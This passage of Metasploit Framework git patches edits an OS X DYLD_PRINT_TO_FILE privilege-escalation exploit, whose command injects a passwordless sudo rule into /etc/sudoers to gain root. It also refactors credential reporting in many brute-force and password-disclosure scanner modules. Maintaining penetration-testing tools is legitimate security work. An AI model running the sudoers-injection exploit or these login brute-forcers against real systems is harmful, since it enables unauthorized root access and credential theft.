-    "/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
+    %q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
   end
 
   def binary_payload

From 6ededbd7a74a3f1cc5d5769b47da34a70c271c27 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 23 Jul 2015 12:23:56 -0500
Subject: [PATCH 0859/1013] Un-ticking the output

---
 modules/exploits/osx/local/dyld_print_to_file_root.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb
index 35d87fffef..a64ba873fc 100644
--- a/modules/exploits/osx/local/dyld_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb
@@ -52,7 +52,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def exploit
-    print_status("Writing payload to `#{payload_file}'")
+    print_status("Writing payload to '#{payload_file}'")
     write_file(payload_file, binary_payload)
     register_file_for_cleanup(payload_file)
     cmd_exec("chmod +x #{payload_file}")

From c1a962833233195b028fee00a187739ad15656ef Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 23 Jul 2015 12:59:20 -0500
Subject: [PATCH 0860/1013] Fix some fixes

So you can fix while you fix.
---
 .../osx/local/dyld_print_to_file_root.rb         | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb
index a64ba873fc..31f6a035a2 100644
--- a/modules/exploits/osx/local/dyld_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb
@@ -17,11 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
     super(update_info(info,
       'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
       'Description'    => %q{
-        In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
-        environment variable, usually used for redirecting logging data to a
-        file, instead of the usual stderr.  Due to a design error, this feature
-        can be abused by a local attacker to write arbitrary files as root, via
-        restricted, SUID root binaries.
+        In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE environment
+        variable is used for redirecting logging data to a file instead of
+        stderr. Due to a design error, this feature can be abused by a local
+        attacker to write arbitrary files as root via restricted, SUID-root
+        binaries.
       },
       'Author'         => [
         'Stefan Esser', # Vulnerability discovery and PoC
@@ -52,12 +52,12 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def exploit
-    print_status("Writing payload to '#{payload_file}'")
+    print_status("Writing payload to `#{payload_file}'")
     write_file(payload_file, binary_payload)
     register_file_for_cleanup(payload_file)
     cmd_exec("chmod +x #{payload_file}")
 
-    print_status("Executing exploit at #{payload_file}...")
+    print_status("Executing exploit at `#{payload_file}'...")
     cmd_exec(sploit)
   end
 
@@ -72,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def sploit
-    %q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
+    %Q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
   end
 
   def binary_payload

From 91fc213ddfa1f5c34b432a043915dc806adb4944 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 23 Jul 2015 15:50:50 -0500
Subject: [PATCH 0861/1013] More metasploit-credential update

---
 .../auxiliary/admin/oracle/oracle_login.rb    |   2 +-
 .../sap_businessobjects_user_brute_web.rb     |  42 ++-
 .../auxiliary/scanner/http/sentry_cdu_enum.rb |  46 ++-
 modules/auxiliary/scanner/http/sevone_enum.rb |  46 ++-
 .../scanner/http/squiz_matrix_user_enum.rb    |  36 ++-
 .../scanner/http/typo3_bruteforce.rb          |  44 ++-
 .../scanner/misc/dvr_config_disclosure.rb     |  42 ++-
 modules/auxiliary/scanner/misc/oki_scanner.rb |  41 ++-
 .../scanner/misc/raysharp_dvr_passwords.rb    |  42 ++-
 .../misc/rosewill_rxs3211_passwords.rb        |  41 ++-
 .../scanner/mongodb/mongodb_login.rb          |  44 ++-
 .../auxiliary/scanner/msf/msf_rpc_login.rb    |  46 ++-
 .../auxiliary/scanner/msf/msf_web_login.rb    |  46 ++-
 .../scanner/nessus/nessus_ntp_login.rb        |  43 ++-
 .../scanner/nexpose/nexpose_api_login.rb      |   2 +-
 .../scanner/openvas/openvas_gsad_login.rb     |   2 +-
 .../scanner/openvas/openvas_omp_login.rb      |   2 +-
 .../scanner/openvas/openvas_otp_login.rb      |   2 +-
 modules/auxiliary/scanner/scada/koyo_login.rb |   2 +-
 modules/auxiliary/server/capture/drda.rb      |   2 +-
 modules/auxiliary/server/capture/ftp.rb       |   2 +-
 .../auxiliary/server/capture/http_basic.rb    |   2 +-
 modules/auxiliary/server/capture/pop3.rb      |   2 +-
 .../auxiliary/server/capture/postgresql.rb    |   2 +-
 modules/auxiliary/server/capture/sip.rb       |   2 +-
 .../auxiliary/test/report_auth_info.rb        | 271 ++++++------------
 26 files changed, 551 insertions(+), 303 deletions(-)

diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb
index b4105840c2..e33a0db012 100644
--- a/modules/auxiliary/admin/oracle/oracle_login.rb
+++ b/modules/auxiliary/admin/oracle/oracle_login.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
index 7e50d316d3..aef82de583 100644
--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb
@@ -46,6 +46,33 @@ class Metasploit3 < Msf::Auxiliary
     }
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def enum_user(user, pass)
     vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")
     success = false
@@ -79,14 +106,13 @@ class Metasploit3 < Msf::Auxiliary
 
     if success
       print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'")
-      report_auth_info(
-        :host   => rhost,
-        :proto => 'tcp',
-        :sname  => 'sap-businessobjects',
-        :user   => user,
-        :pass   => pass,
-        :target_host => rhost,
-        :target_port => rport
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'sap-businessobjects',
+        user: user,
+        password: pass,
+        proof: res.body
       )
       return :next_user
     else
diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
index 1a180a19fb..7567b73111 100644
--- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
+++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb
@@ -69,6 +69,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -85,17 +112,14 @@ class Metasploit3 < Msf::Auxiliary
       if res and !res.get_cookies.empty?
         print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
-        report_hash = {
-          :host   => rhost,
-          :port   => rport,
-          :sname  => 'ServerTech Sentry Switched CDU',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'
-        }
-
-        report_auth_info(report_hash)
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'ServerTech Sentry Switched CDU',
+          user: user,
+          password: pass,
+          proof: res.get_cookies.inspect
+        )
         return :next_user
 
       else
diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb
index 8a0e4774bc..9e8a38d6c5 100644
--- a/modules/auxiliary/scanner/http/sevone_enum.rb
+++ b/modules/auxiliary/scanner/http/sevone_enum.rb
@@ -65,6 +65,33 @@ class Metasploit3 < Msf::Auxiliary
     return false
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Brute-force the login page
   #
@@ -98,17 +125,14 @@ class Metasploit3 < Msf::Auxiliary
       return :skip_pass
     else
       print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN. '#{user.inspect}' : '#{pass.inspect}'")
-
-      report_hash = {
-        :host   => rhost,
-        :port   => rport,
-        :sname  => 'SevOne Network Performance Management System Application',
-        :user   => user,
-        :pass   => pass,
-        :active => true,
-        :type   => 'password'}
-
-      report_auth_info(report_hash)
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'SevOne Network Performance Management System Application',
+        user: user,
+        password: pass,
+        proof: key
+      )
       return :next_user
     end
 
diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
index 1ba09fc870..e3a820fc2a 100644
--- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
+++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb
@@ -80,6 +80,30 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_enum(asset)
     begin
       res = send_request_cgi({
@@ -121,12 +145,12 @@ class Metasploit3 < Msf::Auxiliary
           @users_found[user] = :reported
         end
 
-        report_auth_info(
-        :host => rhost,
-        :sname => (ssl ? 'https' : 'http'),
-        :user => user,
-        :port => rport,
-        :proof => "WEBAPP=\"Squiz Matrix\", VHOST=#{vhost}")
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: (ssl ? 'https' : 'http'),
+          proof: "WEBAPP=\"Squiz Matrix\", VHOST=#{vhost}"
+        )
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::EPIPE
diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
index 5b65cf02a1..46aee2f1cf 100644
--- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb
@@ -39,20 +39,46 @@ class Metasploit3 < Msf::Auxiliary
     }
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def try_login(user, pass)
     vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'")
     cookie = typo3_backend_login(user, pass)
     if cookie
       print_good("#{peer} - Successful login '#{user}' password: '#{pass}'")
-      report_auth_info({
-        :host   => rhost,
-        :proto => 'http',
-        :sname  => 'typo3',
-        :user   => user,
-        :pass   => pass,
-        :target_host => rhost,
-        :target_port => rport
-      })
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'typo3',
+        user: user,
+        password: pass,
+        proof: cookie
+      )
       return :next_user
     else
       vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'")
diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
index 47edca4473..69c134e532 100644
--- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
+++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
@@ -138,14 +138,40 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    report_auth_info({
-      :host         => server,
-      :port         => port,
-      :sname        => 'ftp',
-      :duplicate_ok => false,
-      :user         => user,
-      :pass         => password
-    })
+    report_cred(
+      ip: server,
+      port: port,
+      service_name: 'ftp',
+      user: user,
+      password: password,
+      proof: conf.inspect
+    )
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def get_dvr_credentials(conf)
diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb
index 9ea0e95333..44f949da95 100644
--- a/modules/auxiliary/scanner/misc/oki_scanner.rb
+++ b/modules/auxiliary/scanner/misc/oki_scanner.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::SNMPClient
   include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
 
   def initialize(info={})
     super(update_info(info,
@@ -37,6 +38,33 @@ class Metasploit3 < Msf::Auxiliary
     datastore['RPORT'] = @org_rport
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     @org_rport = datastore['RPORT']
     datastore['RPORT'] = datastore['SNMPPORT']
@@ -80,12 +108,13 @@ class Metasploit3 < Msf::Auxiliary
         case response
         when "200"
           print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}")
-          report_auth_info(
-            :host  => rhost,
-            :port  => datastore['HTTPPORT'],
-            :proto => "tcp",
-            :user  => 'admin',
-            :pass  => last_six
+          report_cred(
+            ip: rhost,
+            port: datastore['HTTPPORT'],
+            service_name: 'http',
+            user: 'admin',
+            password: last_six,
+            proof: response.inspect
           )
         when "401"
           print_error("Default credentials failed")
diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb
index 9dbc33a081..9f0c275fd7 100644
--- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb
+++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb
@@ -37,6 +37,32 @@ class Metasploit3 < Msf::Auxiliary
     register_options( [ Opt::RPORT(9000) ], self.class)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
     req =
       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" +
@@ -76,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary
     if creds.keys.length > 0
       creds.keys.sort.each do |user|
         pass = creds[user]
-        report_auth_info({
-          :host         => rhost,
-          :port         => rport,
-          :sname        => 'dvr',
-          :duplicate_ok => false,
-          :user         => user,
-          :pass         => pass
-        })
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'dvr',
+          user: user,
+          password: pass,
+          proof: pass
+        )
         info << "(user='#{user}' pass='#{pass}') "
       end
     end
diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
index fa83664e78..b9edb09746 100644
--- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
+++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
@@ -80,16 +80,43 @@ class Metasploit3 < Msf::Auxiliary
     #Store the password if the parser returns something
     if password
       print_status("Password retrieved: #{password.to_s}")
-      report_auth_info({
-        :host         => rhost,
-        :port         => rport,
-        :sname        => 'ipcam',
-        :duplicate_ok => false,
-        :pass         => password,
-      })
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'ipcam',
+        user: '',
+        password: password,
+        proof: password
+      )
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def parse_reply(pkt)
     @results ||= {}
 
diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb
index 6d9dc76358..e8091b4b1b 100644
--- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb
+++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb
@@ -120,21 +120,47 @@ class Metasploit3 < Msf::Auxiliary
     response = sock.recv(1024)
     unless have_auth_error?(response)
       print_good("#{rhost} - SUCCESSFUL LOGIN '#{user}' : '#{password}'")
-      report_auth_info({
-        :host        => rhost,
-        :port        => rport,
-        :sname       => 'mongodb',
-        :user        => user,
-        :pass        => password,
-        :source_type => 'user_supplied',
-        :active      => true
-      })
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'mongodb',
+        user: user,
+        password: password,
+        proof: response.inspect
+      )
       return :next_user
     end
 
     return
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def get_nonce
     request_id = Rex::Text.rand_text(4)
     packet =  "\x3d\x00\x00\x00"   # messageLength (61)
diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb
index 31420e8be3..1f3100ec96 100644
--- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb
+++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb
@@ -66,23 +66,47 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user='msf', pass='msf')
     vprint_status("Trying username:'#{user}' with password:'#{pass}'")
     begin
       res = @rpc.login(user, pass)
       if res
         print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
-
-        report_hash = {
-          :host   => datastore['RHOST'],
-          :port   => datastore['RPORT'],
-          :sname  => 'msf-rpc',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
-        report_auth_info(report_hash)
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'msf-rpc',
+          user: user,
+          password: pass,
+          proof: res.body
+        )
         @rpc.close
         return :next_user
       end
diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb
index 00a3ba1ef9..69de8c6964 100644
--- a/modules/auxiliary/scanner/msf/msf_web_login.rb
+++ b/modules/auxiliary/scanner/msf/msf_web_login.rb
@@ -124,16 +124,14 @@ class Metasploit3 < Msf::Auxiliary
       else
         print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
 
-        report_hash = {
-          :host   => datastore['RHOST'],
-          :port   => datastore['RPORT'],
-          :sname  => 'msf-web',
-          :user   => user,
-          :pass   => pass,
-          :active => true,
-          :type => 'password'}
-
-        report_auth_info(report_hash)
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'msf-web',
+          user: user,
+          password: pass,
+          proof: res.headers['Location']
+        )
         return :next_user
       end
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
@@ -141,4 +139,32 @@ class Metasploit3 < Msf::Auxiliary
       return :abort
     end
   end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 end
diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
index bfa7617f28..ba12f61143 100644
--- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb
@@ -64,6 +64,33 @@ class Metasploit3 < Msf::Auxiliary
     end
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def do_login(user=nil,pass=nil)
     begin
       ntp_send("< NTP/1.0 >\n",true) # send hello
@@ -84,15 +111,15 @@ class Metasploit3 < Msf::Auxiliary
       ntp_send("#{pass}\n",!@connected)
       if @result =~ /SERVER <|>.*<|> SERVER/is
         print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => 'nessus-ntp',
-          :user => user,
-          :pass => pass,
-          :source_type => "user_supplied",
-          :active => true
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'nessus-ntp',
+          user: user,
+          password: pass,
+          proof: @result
         )
+
         disconnect
         @connected = false
         return :next_user
diff --git a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
index 3374f18e32..bff40a5dba 100644
--- a/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
+++ b/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
index 032e2d2643..94574d4e3b 100644
--- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
index 71804b7ea8..c778ba15ca 100644
--- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
index 6d812d7295..fbf870fb2d 100644
--- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
+++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/scanner/scada/koyo_login.rb b/modules/auxiliary/scanner/scada/koyo_login.rb
index f444d9c914..ecf1f50a29 100644
--- a/modules/auxiliary/scanner/scada/koyo_login.rb
+++ b/modules/auxiliary/scanner/scada/koyo_login.rb
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
+      private_type: :password
     }.merge(service_data)
 
     login_data = {
diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb
index 871b44c1bf..970b8cda7f 100644
--- a/modules/auxiliary/server/capture/drda.rb
+++ b/modules/auxiliary/server/capture/drda.rb
@@ -251,7 +251,7 @@ class Metasploit3 < Msf::Auxiliary
       module_fullname: fullname,
       username: opts[:user],
       private_data: opts[:password],
-      private_type: :nonreplayable_hash
